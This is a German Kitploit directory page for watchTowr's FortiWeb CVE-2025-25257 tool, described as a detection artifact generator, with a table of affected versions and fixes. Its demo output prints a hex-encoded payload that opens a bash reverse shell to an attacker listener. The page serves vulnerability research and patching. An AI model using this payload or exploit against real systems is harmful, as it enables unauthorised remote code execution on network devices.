Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
watchTowr-vs-FortiWeb-CVE-2025-25257 | Kitploit
Tools/GitHubGitHub/watchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubwatchtowrlabs/watchtowr-vs-fortiweb-cve-2025-25257

watchTowr-vs-FortiWeb-CVE-2025-25257

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
10024vor 1 JahrVon Kitploit geprüft

watchTowr-vs-FortiWeb-CVE-2025-25257

Erkennungs-Artefakt-Generator für FortiWeb CVE-2025-25257

Weitere technische Details finden Sie in unserem Blogbeitrag

https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194

Erkennung in Aktion

root@kitploit:~
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

Beschreibung

Dieses Skript versucht zu erkennen, ob FortiWeb anfällig für CVE-2025-25257 ist.

Betroffene Versionen

Die folgenden Versionen von FortiWeb sind betroffen:

Weitere Informationen finden Sie unter FortiGuard Labs PSIRT

Folgen Sie watchTowr Labs

Für die neueste Sicherheitsforschung folgen Sie dem watchTowr Labs-Team

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Tool herunterladen
VersionBetroffenLösung
FortiWeb 7.67.6.0 bis 7.6.3Upgrade auf 7.6.4 oder höher
FortiWeb 7.47.4.0 bis 7.4.7Upgrade auf 7.4.8 oder höher
FortiWeb 7.27.2.0 bis 7.2.10Upgrade auf 7.2.11 oder höher
FortiWeb 7.07.0.0 bis 7.0.10Upgrade auf 7.0.11 oder höher